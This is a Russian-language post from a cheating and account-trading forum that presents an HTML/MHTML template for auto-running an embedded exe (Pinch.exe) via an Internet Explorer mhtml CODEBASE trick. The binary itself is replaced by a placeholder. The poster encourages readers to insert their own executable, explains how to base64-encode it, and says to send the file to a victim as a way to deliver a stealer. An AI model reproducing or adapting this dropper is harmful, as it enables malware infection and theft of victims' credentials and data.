Запуск Ехе-файла через Html страницу [Без софта] - Форум - Cheat-Master.Ru | Читерский Форум | Читы для SAMP,CS,Minecraft,CoD,Warface | Продажа аккаунтов SAMP,WoT,Steam,Origin,Warface | Баги,статьи SAMP-RP,Advance-RP,Diamond-RP | Магазин аккаунтов SAMP-RP,Advance-RP,Diamond-RP,Steam,WoT,Warface

Страница 1 из 11
Модератор форума: [CM]Russel 
Форум » Общение, флуд, оффтоп » Разное » Запуск Ехе-файла через Html страницу [Без софта] (Запуск Ехе-файла через Html страницу [Без софта])
Запуск Ехе-файла через Html страницу [Без софта]
Sargon™Дата: Суббота, 22.10.2016, 20:25 | Сообщение # 1
Новичок
Группа: Заблокированные
Сообщений: 3
Статус: Offline
Войдите на сайт или зарегистрируйтесь для просмотра полного содержимого темы.

Сидел я и ползал по просторам интернета и решил проверить свой почтовый ящик.
Там оказалось недавно пришедшее письмо странного содержания.
В начале втирали про что-то на русско-английском языке, а потом такая фраза: "Я слышал, что ты болеешь.
Выздоравливай скорее!". Примерно так. Что за чудо, я не болел уже давно.
К письму был прикреплен архив, защищенный паролем.
А пароль был в тексте письма: docs. В письме говорилось, что в архиве лежат пароли боссов.
Пароль к архиву подошел, и передо мной предстал ни в чем не повинный html файлик объемом всего в 15 килобайт.
Ну естественно запускать я его не стал, а нажал "F4" (в Total Commander'e).
Откылся Блокнот, с содержанием файла docs.html.

Код
MIME-Version: 1.0
Content-Location:file:///Pinch.exe
Content-Transfer-Encoding: base64
[BINARY TEXT VIRUS]
<title>Welcome - Home</title>
<body bgcolor=black scroll=no>
<script>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write( ' <title>Welcome - Home</title>
<body scroll=no bgcolor=black><FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100; font-size:2cm;">
Sorry, Error On This Page! Please Open With Internet Explorer</center>
<object style="cursor:cross-hair" alt="Sorry, Error On This Page!
Please Open With Internet Explorer" classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:'+path+'\\docs.html!file:///Pinch.exe">
</object>' <img src="/.s/sm/2/wink.gif" border="0" align="absmiddle" alt="wink" />
}
setTimeout("malware()",150)
</script>


Строка [BINARY TEXT VIRUS] означает, что на этом месте был закодирован exe файл вируса, вставлять я его не стал, уж слишком много места займет.
Перед вами макет автозапуска вируса из html файла.
Его можно использовать и для ваших творений.
Просто замените текст [BINARY TEXT VIRUS] на ваш код exe файла.
А код можно легко получить следующим образом...
Зайдите в почтовый клиент и нажмите "Написать новое сообщение", в открывшемся окне щелкните "Вставка" -> "Вложение файла".
Теперь "Файл" -> "Сохранить как...". После сохранения письма, его нужно открыть в Текстовом редакторе и вырезать тот самый код exe файла.
И все,отправляем жертве. Хороший способ для отправки стилера.
Ccылки
Найти еще что-нибудь в магазине:
Форум » Общение, флуд, оффтоп » Разное » Запуск Ехе-файла через Html страницу [Без софта] (Запуск Ехе-файла через Html страницу [Без софта])
Страница 1 из 11
Поиск:
Статистика Форума
Последнии темы Читаемые темы Лучшие пользователи Новые пользователи
♣►♣►♣[SRP] ПРОДАЖА/ПОКУПК... [Captain_Boian]

✭ Быстрая накрутка $$$ / ... [Werewolf59]

Продажа : Админок\Лид... [Ermaev]

[1466797] Женя_Якут, не в... [Женя_Якут]

СЛИВ ПДШНИКА НА АРИЗОНЕ &... [[CM]MikeTawer]

Как сбить анимку в больке [Mithun_Chakraborty]

Продам личный аккаунт [Solomon21]

Продам Samp-RP/05 13LvL B... [Maksim2405]

НОВЫЙ ГОД - Аватарки, Нов... [[CM]†Tuborg†]

ПРОДАЖА ЖИРА НА АДВАНС РП... [[CM]Lazy_]

[1]>S0beit - pr9n project for samp 0.3.7 [9421]

[2]>RakBot 0.6.4 - прокачка аккаунтов без GTA [9108]

[3]>Часто задаваемые вопросы... [8092]

[4]>Advance-RP, Diamond-Rp, Amazing CRMP [7501]

[5]>Вопросы и ответы [6183]

[6]>[0.3.7][RUS] Sobeit modified by MishaN [6126]

[7]>Продажа вирт 1кк АМЕРП~ 400р АРП~400р ДРП~400р.СРП~150р. [5806]

[8]>SAMP-Bot 0.5.8.6 by Jamely [4581]

[9]>Бесконечное слово [4495]

[10]>[Samp-Rp.Ru]Обновлен список Админов (27.01.2016) [4112]

[11]>[CLEO] Вопрос - Ответ [4020]

[12]>Курилка [3110]

[1]>АК_47 [22016]

[2]>GеNius [6282]

[3]>romka619 [5452]

[4]>[CM]AGRESSOR [5028]

[5]>baffometi [4491]

[6]>Artem_Buero [3883]

[7]>Snake_Firm [3845]

[8]>[CM]Russel [3829]

[9]>iMaddy [2872]

[10]>Logan™ [2545]

[11]>zetkolya [2524]

[12]>Ch0c0Cube [2415]

[13]>[CM]ProKeyar [2357]

[14]>[CM]Durman [2329]

[15]>Sawyer [2281]

Denchik_Ris [06.12.2016|13:08]

sdfsdf3sdfsdf [06.12.2016|13:07]

Snookez112 [06.12.2016|13:07]

Giusha123 [06.12.2016|13:02]

giushaaa123 [06.12.2016|12:58]

MocBull [06.12.2016|12:57]

Werewolf59 [06.12.2016|12:54]

makc2341 [06.12.2016|12:49]

mikhail147 [06.12.2016|12:48]

okolokota [06.12.2016|12:46]

SSSSS222SWAT [06.12.2016|12:39]

macki1234567 [06.12.2016|12:39]

ZonexXx [06.12.2016|12:25]

olejkaolejka [06.12.2016|12:25]

Rakim_Maers228322 [06.12.2016|12:21]


CM Team © 2009-2016 Администрация не несёт ответственности за размещённые материалы. Условия пользования
Все материалы предоставлены в ознакомительных целях и администрация предлагает удалить их после ознакомления.

Положение о защите персональных данных на сайте, Пользовательское соглашение, Договор оказания услуг.